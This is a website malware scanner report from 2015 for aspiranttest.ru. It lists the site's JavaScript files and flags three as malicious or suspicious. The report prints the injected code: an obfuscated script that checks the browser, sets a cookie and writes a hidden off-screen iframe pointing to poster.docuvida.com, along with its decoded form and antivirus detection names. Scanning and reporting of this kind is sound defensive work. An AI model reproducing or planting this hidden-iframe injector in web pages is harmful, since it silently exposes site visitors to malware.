New scan:

Malware Scanner report for aspiranttest.ru

Malicious/Suspicious/Total urls checked
2/1/15
3 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://aspiranttest.ru/
200 OK
Content-Length: 27890
Content-Type: text/html
clean
http://aspiranttest.ru/js/api/cc2d475.js
200 OK
Content-Length: 64063
Content-Type: application/javascript
clean
http://aspiranttest.ru/js/api/4e12131.js
200 OK
Content-Length: 10156
Content-Type: application/javascript
clean
http://aspiranttest.ru/js/250/addthis_widget.js
200 OK
Content-Length: 10802
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/niftycube.js
200 OK
Content-Length: 12029
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/jquery-1.3.2.min.js
200 OK
Content-Length: 2055
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 993 bytes are skipped ...

}
if (!control_agent()) {
var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf');
if (cookie == undefined) {
setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804);
document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://poster.docuvida.com/jtriyttewtewyrh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>');
}
};
})();

Decoded script:


<iframe src="http://poster.docuvida.com/jtriyttewtewyrh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://aspiranttest.ru/published/SC/html/scripts/js/jscroller-0.4.js
200 OK
Content-Length: 4379
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Noki
...[3640 bytes skipped]...

Decoded script:

...[4134 bytes skipped]...
hild.height(),width=a.child.width();if(!a.pause){switch(a.direction){case'up':if(top<=-1*height){top=min_height}a.child.css('top',top-a.speed+'px');break;case'right':if(left>=min_width){left=-1*width}a.child.css('left',left+a.speed+'px');break;case'left':if(left<=-1*width){left=min_width}a.child.css('left',left-a.speed+'px');break;case'down':if(top>=min_height){top=-1*height}a.child.css('top',top+a.speed+'px');break}}}}}};
<iframe src="http://poster.docuvida.com/jtriyttewtewyrh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

http://aspiranttest.ru/published/SC/html/scripts/js/sc.js
200 OK
Content-Length: 2249
Content-Type: application/javascript
clean
http://aspiranttest.ru/js/motionpack.js
200 OK
Content-Length: 2398
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/publicdata/CP254666TEST/attachments/SC/themes/lucid/head.js
200 OK
Content-Length: 22
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/functions.js
200 OK
Content-Length: 18665
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/behavior.js
200 OK
Content-Length: 10164
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/widget_checkout.js
200 OK
Content-Length: 16593
Content-Type: application/javascript
clean
http://aspiranttest.ru/published/SC/html/scripts/js/frame.js
200 OK
Content-Length: 9374
Content-Type: application/javascript
clean
http://aspiranttest.ru/js/dojoci.js
200 OK
Content-Length: 109881
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\
... 3131 bytes are skipped ...
border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); color: #FFFFFF; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .butn-inverse:hover, .butn-inverse:active, .butn-inverse.active, .butn-inverse.disabled, .butn-inverse[disabled] { background-color: #222222; color: #FFFFFF; } </style>');
document.write('<div id="basic-modal-content2" style="display:none"></div>'); document.write("<style>.dajacudn { display:none; }</style>");

Antivirus reports:

Bkav
W32.HfsIframe.3abf


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: aspiranttest.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 12:06:25 GMT
Server: nginx/1.5.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.10-1ubuntu3.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: aspiranttest.ru
Referer: http://www.google.com/search?q=aspiranttest.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=aspiranttest.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aspiranttest.ru/

Result: aspiranttest.ru is not infected or malware details are not published yet.